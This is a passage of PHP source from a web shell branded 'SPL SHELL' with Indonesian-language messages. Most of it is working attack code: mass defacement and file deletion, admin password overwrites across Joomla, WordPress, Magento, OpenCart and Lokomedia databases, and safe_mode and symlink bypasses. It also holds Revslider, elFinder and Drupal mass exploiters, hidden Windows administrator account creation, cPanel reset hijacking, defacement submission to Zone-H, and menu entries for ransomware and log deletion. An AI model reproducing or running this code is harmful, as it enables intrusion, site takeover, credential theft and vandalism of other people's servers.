"; } function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } if($_POST['mass'] == 'onedir') { echo "
Versi Text Area

Versi Text


\n"; $mainpath=$_POST[d_dir];$file=$_POST[d_file]; $dir=opendir("$mainpath"); $code=base64_encode($_POST[script]); $indx=base64_decode($code); while($row=readdir($dir)){$start=@fopen("$row/$file","w+"); $finish=@fwrite($start,$indx); if ($finish){echo 'http://' . $row . '/' . $file . '
'; } } echo "
"; } elseif($_POST['mass'] == 'sabunkabeh') { gass(); } elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); } elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); } elseif($_POST['mass'] == 'massdeface') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } else { echo "

Mass Deface / Delete Files SPL SHELL

Select Type:
Folder:

Filename:

Index File:


"; } } elseif (isset($_GET[hex('mass_user')])) { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { print "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; if(preg_match("/^http:\/\//", $conf) OR preg_match("/^https:\/\//", $conf)) { $get = curl($conf); preg_match_all('//', $get, $link); foreach($link[1] as $link_config) { $scan_conf[] = "$link_config.txt"; } } else { $scan_conf = scandir($conf); } foreach($scan_conf as $file_conf) { $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = getValue($config,"host = '","'"); $dbuser = getValue($config,"user = '","'"); $dbpass = getValue($config,"password = '","'"); $dbname = getValue($config,"db = '","'"); $dbprefix = getValue($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = getValue($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); print "Config => ".$file_conf."
"; print "CMS => Joomla
"; if($site == '') { print "Sitename => ".color(1, 1, "Can't get domain name")."
"; } else { print "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = getValue($config,"DB_HOST', '","'"); $dbuser = getValue($config,"DB_USER', '","'"); $dbpass = getValue($config,"DB_PASSWORD', '","'"); $dbname = getValue($config,"DB_NAME', '","'"); $dbprefix = getValue($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); print "Config => ".$file_conf."
"; print "CMS => Wordpress
"; print $url_target; if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = getValue($config,""); $dbuser = getValue($config,""); $dbpass = getValue($config,""); $dbname = getValue($config,""); $dbprefix = getValue($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); print "Config => ".$file_conf."
"; print "CMS => Magento
"; print $url_target; if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = getValue($config,"'DB_HOSTNAME', '","'"); $dbuser = getValue($config,"'DB_USERNAME', '","'"); $dbpass = getValue($config,"'DB_PASSWORD', '","'"); $dbname = getValue($config,"'DB_DATABASE', '","'"); $dbprefix = getValue($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = getValue($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); print "Config => ".$file_conf."
"; print "CMS => OpenCart
"; print $url_target; if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = getValue($config,'server = "','"'); $dbuser = getValue($config,'username = "','"'); $dbpass = getValue($config,'password = "','"'); $dbname = getValue($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => ".color(1, 1, "Cant't get domain name")."
"; if($target2 == '') { $url_target2 = "Login => ".color(1, 1, "Cant't get domain name")."
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); print "Config => ".$file_conf."
"; print "CMS => Lokomedia
"; if(preg_match("/Can't get domain name/", $url_target)) { print $url_target2; } else { print $url_target; } if(!$update OR !$conn OR !$db) { print "Status => ".color(1, 1, mysql_error())."

"; } else { print "Status => ".color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.")."

"; } mysql_close($conn); } } } } else { print "

Mass User Changer SPL SHELL

DIR Config LINK Config



Set User & Pass:



"; } } elseif (isset($_GET[hex('mass_title')])) { echo "

Mass Title Changer SPL SHELL

Link Config:



"; if($_POST['gass']) { echo "
Link Config:

ID:
TITLE :
POST CONTENT:
POSTNAME:
"; } if($_POST['edittitle']) { $title = htmlspecialchars($_POST['title']); $id = $_POST['id']; $content = $_POST['content']; $postname = $_POST['name']; function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."posts"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$content',post_name='$postname',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "
"; if($target == '') { echo "URL: error, gabisa ambil nama domain nya -> "; } else { echo "URL: $target/?p=$id -> "; } if(!$update OR !$conn OR !$db) { echo "MySQL Error: ".mysql_error()."
"; } else { echo "sukses di ganti.
"; } echo "
"; mysql_close($conn); } } } elseif (isset($_GET[hex('bypass')])) { echo "

"; echo "

Bypasser SPL SHELL


"; echo "
Bypass CloudFlare
Bypass Server
Bypass Vhost
Bypass Passwd
"; echo "
"; } elseif (isset($_GET[hex('bypass-cf')])) { echo '


Bypass CloudFlare SPL SHELL


'; $target = $_POST['target']; # Bypass From FTP if($_POST['krz'] == "ftp") { $ftp = gethostbyname("ftp."."$target"); echo "

Correct ip is : $ftp

"; } # Bypass From Direct-Connect if($_POST['krz'] == "direct-conntect") { $direct = gethostbyname("direct-connect."."$target"); echo "

Correct ip is : $direct

"; } # Bypass From Webmail if($_POST['krz'] == "webmail") { $web = gethostbyname("webmail."."$target"); echo "

Correct ip is : $web

"; } # Bypass From Cpanel if($_POST['krz'] == "cpanel") { $cpanel = gethostbyname("cpanel."."$target"); echo "

Correct ip is : $cpanel

"; } } elseif (isset($_GET[hex('bypass-server')])) { $dir = path(); ?>

Bypass Server SPL SHELL



Command
 

Menu Bypass

'; ini_restore("safe_mode"); ini_restore("open_basedir"); $liz0=shell_exec($_POST[baba]); $liz0zim=shell_exec($_POST[liz0]); $uid=shell_exec('id'); $server=shell_exec('uname -a'); echo "
";

echo $liz0;
echo $liz0zim;
echo "
"; "
"; ?>
"; echo "

Bypass Symlink vHost

"; echo "
"; if (isset($_POST['Colii'])){ system('ln -s / SPL.txt'); $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw'; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","SPL.txt"); $rt="
Bypassed Successfully"; echo "

Done.. !

Check link given below for / folder symlink
$rt
";} echo "

"; } elseif (isset($_GET[hex('bypass-passwd')])) { echo '

Bypass Etc/Passwd



Bypass User

'; if ($_POST['awkuser']) { echo"
"; } if ($_POST['systuser']) { echo"
"; } if ($_POST['passthuser']) { echo"
"; } if ($_POST['exuser']) { echo"
"; } if ($_POST['shexuser']) { echo"
"; } if($_POST['syst']) { echo"


"; } if($_POST['passth']) { echo"


"; } if($_POST['ex']) { echo"


"; } if($_POST['shex']) { echo"


"; } echo '
'; if($_POST['melex']) { echo"

"; } } elseif (isset($_GET[hex('exploiter')])) { echo "

"; echo "

Exploiter SPL SHELL


"; echo "
CSRF Exploiter
Revslider Exploiter
Elfinder Exploiter
Drupal Exploiter
"; echo "
"; } elseif (isset($_GET[hex('csrf')])) { echo '

CSRF Exploiter SPL SHELL



*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc

URL:
POST File:

'; $url = $_POST["url"]; $pf = $_POST["pf"]; $d = $_POST["d"]; if($d) { echo "

Upload Your Files

"; } } elseif (isset($_GET[hex('revslider')])) { echo "

Revslider Exploiter SPL SHELL



"; function findit($mytext, $starttag, $endtag) { $posLeft = stripos($mytext, $starttag) + strlen($starttag); $posRight = stripos($mytext, $endtag, $posLeft + 1); return substr($mytext, $posLeft, $posRight - $posLeft); } error_reporting(0); set_time_limit(0); $ya = $_POST['sikat']; $co = $_POST['site']; if ($ya) { $e = explode(" ", $co); foreach ($e as $bda) { //echo '
'.$bda; $linkof = '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'; $dn = ($bda) . ($linkof); $file = @file_get_contents($dn); if (eregi('DB_HOST', $file) and !eregi('FTP_USER', $file)) { echo '
----------------------------------------------
'; echo "
" . $bda . "
"; echo "DB name : " . findit($file, "DB_NAME', '", "');") . "
"; echo "DB user : " . findit($file, "DB_USER', '", "');") . "
"; echo "DB pass : " . findit($file, "DB_PASSWORD', '", "');") . "
"; echo "DB host : " . findit($file, "DB_HOST', '", "');") . "
"; } elseif (eregi('DB_HOST', $file) and eregi('FTP_USER', $file)) { echo '
----------------------------------------------
'; echo "
" . $bda . "
"; echo "FTP user : " . findit($file, "FTP_USER','", "');") . "
"; echo "FTP pass : " . findit($file, "FTP_PASS','", "');") . "
"; echo "FTP host : " . findit($file, "FTP_HOST','", "');") . "
"; } else { echo "
" . $bda . " ----> not infected
"; } echo '
----------------------------------------------
'; } } } elseif (isset($_GET[hex('elfinder')])) { echo "

"; echo "
"; echo '

ElFinder Mass Exploiter

'; echo '
Target:


'; function ngirim($url, $isi) { $ch = curl_init("$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $isi); curl_setopt($ch, CURLOPT_COOKIEJAR, 'coker_log'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'coker_log'); $data3 = curl_exec($ch); return $data3; } $target = explode(" ", $_POST['target']); if ($_POST['x']) { foreach ($target as $korban) { $nama_doang = "SPL.php"; $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1 lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg=="; $decode_isi = base64_decode($isi_nama_doang); $encode = base64_encode($nama_doang); $fp = fopen($nama_doang, "w"); fputs($fp, $decode_isi); echo "[!] $korban
"; echo "# Upload[1] ......
"; $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw"; $b = file_get_contents("$url_mkfile"); $post1 = array("cmd" => "put", "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array("current" => "8ea8853cb93f2f9781e0bf6e857015ea", "upload[]" => "@$nama_doang",); $output_mkfile = ngirim("$korban", $post1); if (preg_match("/$nama_doang/", $output_mkfile)) { echo "# Upload Sukses 1... => $nama_doang
# Coba buka di ../../elfinder/files/...

"; } else { echo "# Upload Gagal Cok! 1
# Uploading 2..
"; $upload_ah = ngirim("$korban?cmd=upload", $post2); if (preg_match("/$nama_doang/", $upload_ah)) { echo "# Upload Sukses 2 => $nama_doang
# Coba buka di ../../elfinder/files/...

"; } else { echo "# Upload Gagal Lagi Cok! 2

"; } } } } } elseif (isset($_GET[hex('drupal')])) { echo "

"; echo "

Drupal Mass Exploiter





"; $drupal = ($_GET["drupal"]); if ($drupal == 'drupal') { $filename = $_FILES['file']['name']; $filetmp = $_FILES['file']['tmp_name']; echo "
"; move_uploaded_file($filetmp, $filename); } error_reporting(0); if (isset($_POST['submit'])) { function exploit($url) { $post_data = "name[0;update users set name %3D 'SPL' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded ", 'content' => $post_data)); $ctx = stream_context_create($params); $data = file_get_contents($url . '/user/login/', null, $ctx); if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) { $fp = fopen("exploited.txt", 'a+'); fwrite($fp, "Exploitied User: SPL Pass: SPL =====> {$url}/user/login"); fwrite($fp, " "); fwrite($fp, "--------------------------------------------------------------------------------------------------"); fwrite($fp, " "); fclose($fp); echo "Success:SPL Pass:SPL => {$url}/user/login
"; } else { echo "Failed => {$url}/user/login
"; } } $urls = explode(" ", $_POST['url']); foreach ($urls as $url) { $url = @trim($url); echo exploit($url); } } } elseif (isset($_GET[hex('auto_tools')])) { echo '

Auto Tools SPL SHELL


Zone H
Defacer ID
Jumping
Fake Root
Adminer
Wp Auto Hijack
Cpanel Reset
Zip Menu
Reverse IP
K-RDP Shell
Ransomware
WhoIs
Php Info
Inject Code
DB Dump
Cpanel Crack
SMTP Grabber
Domains Viewer
WHMCS Decoder
Delete Logs
SPL R4N50M3W4R3

'; } elseif (isset($_GET[hex('zone-h')])) { ?>

Zone H Submit SPL SHELL

Defacer :
Attacks Method :
Reasons :

(1 Domain Per Lines)


"; ++$i; } echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!"; } ?>

Defacer ID Submit SPL SHELL

Defacer:

Team:

Domains:


"; $site = explode("\r\n", $_POST['sites']); $go = $_POST['go']; $hekel = $_POST['hekel']; $tim = $_POST['tim']; if($go) { foreach($site as $sites) { $zh = $sites; $form_url = "https://www.defacer.id/notify"; $data_to_post = array(); $data_to_post['attacker'] = "$hekel"; $data_to_post['team'] = "$tim"; $data_to_post['poc'] = 'SQL Injection'; $data_to_post['url'] = "$zh"; $curl = curl_init(); curl_setopt($curl,CURLOPT_URL, $form_url); curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm) curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html'); $result = curl_exec($curl); echo $result; curl_close($curl); echo "
"; } } } elseif (isset($_GET[hex('jumping')])) { echo "

Jumping SPL SHELL

"; echo "
"; echo " "; echo "

"; if (isset($_POST['jump'])) { $i = 0; echo "
";
	$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
	while($passwd = fgets($etc)) {
		if($passwd == '' || !$etc) {
			echo "Can't read /etc/passwd";
		} else {
			preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
			foreach($user_jumping[1] as $user_Exc_jump) {
				$user_jumping_dir = "/home/$user_Exc_jump/public_html";
				if(is_readable($user_jumping_dir)) {
					$i++;
					$jrw = "[R] $user_jumping_dir";
					if(is_writable($user_jumping_dir)) {
						$jrw = "[RW] $user_jumping_dir";
					}
					echo $jrw;
					if(function_exists('posix_getpwuid')) {
						$domain_jump = file_get_contents("/etc/named.conf");	
						if($domain_jump == '') {
							echo " => ( gabisa ambil nama domain nya )
";
						} else {
							preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
							foreach($domains_jump[1] as $dj) {
								$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
								$user_jumping_url = $user_jumping_url['name'];
								if($user_jumping_url == $user_Exc_jump) {
									echo " => ( $dj )
";
									break;
								}
							}
						}
					} else {
						echo "
";
					}
				}
			}
		}
	}
	if($i == 0) { 
	} else {
		echo "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
	}
	echo "
"; } } elseif (isset($_GET[hex('fake-root')])) { ob_start(); if(!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die("I Think this server is not using shared host "); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk."\n"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach($site as $url) { $cek = cek("$url/~$user/$file"); if(preg_match("/hacked/i", $cek)) { echo "URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "

Fake Root SPL SHELL

Filename:

User:

Domain:


NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.

"; } } elseif (isset($_GET[hex('adminer')])) { echo "

"; echo "

Adminer SPL SHELL

"; echo "
"; echo "

"; if (isset($_POST['do_adminer'])) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "
-> adminer login <-
"; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
-> adminer login <-
"; } else { echo "
gagal buat file adminer
"; } } } } elseif (isset($_GET[hex('rdp')])) { if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { if($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if(preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user sudah ada"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".gethostbyname($_SERVER['HTTP_HOST'])."
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { echo "[add user] -> Berhasil
"; } else { echo "[add user] -> Gagal
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Berhasil
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Berhasil
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Berhasil
"; } else { echo "[add localgroup] -> Gagal
"; } echo "------------------------------
"; } } elseif($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if(preg_match("/$user/", $cek)) { echo "[ Sudah ada ]
------------------------------

$cek
"; } else { echo "[ belum ada ]"; } } elseif($_POST['opsi'] == '2') { $cek = exe("net user $user SPL"); if(preg_match("/$user/", exe("net user"))) { echo "[change password: SPL] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } elseif($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if(preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } else { // } } else { echo "

"; echo "

RDP SPL SHELL

"; echo "-- Create RDP --
Username:
Password:
Button:

-- Option --

"; } } else { echo "Fitur ini hanya dapat digunakan dalam Windows Server."; } } elseif (isset($_GET[hex('wp-hijack')])) { echo '

Wordpress Hijack Index SPL SHELL






'; $pghost = $_POST['pghost']; $dbnmn = $_POST['dbnmn']; $dbusrrrr = $_POST['dbusrrrr']; $pwddbbn = $_POST['pwddbbn']; $index = stripslashes($_POST['pown']); $prefix = $_POST['prefix']; //$prefix = "wp_"; if ($_POST['up2']) { @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error()); @mysql_select_db($dbnmn) or die(mysql_error()); $tableName = $prefix . "posts"; $ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 "); if (!$ghost1) { $ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 "); } elseif (!$ghost2) { $ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 "); } mysql_close(); if ($ghost1 || $ghost2 || $ghost3) { echo "

Index Website Have been Hijacked Successfully

"; } else { echo "

Failed To Hijack the Website :(

"; } } } elseif (isset($_GET[hex('cpanel-reset')])) { echo '

Cpanel Reset SPL SHELL



Email :


'; $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); if(isset($_POST['submit'])){ $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); $parm = "Disini : " . $site.':2083/resetpass?start=1'; echo '
'.$parm.'
'; }; } elseif (isset($_GET[hex('zip-menu')])) { $dir = path(); echo "
"; echo "

"; echo "

Zip Menu

"; function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ('.' === $file || '..' === $file) continue; if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file"); else unlink("$dir/$file"); } rmdir($dir); } if ($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed'); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == 'zip' ? true : false; if (!$continue) { $message = "Itu Bukan Zip , , GOBLOK COK"; } $path = dirname(__FILE__) . '/'; $filenoext = basename($filename, '.zip'); $filenoext = basename($filenoext, '.ZIP'); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) rmdir_recursive($targetdir); mkdir($targetdir, 0777); if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "Sukses Cok :)"; } else { $message = "Error Jancok :("; } } echo '

'; if ($message) echo "

$message

"; echo "

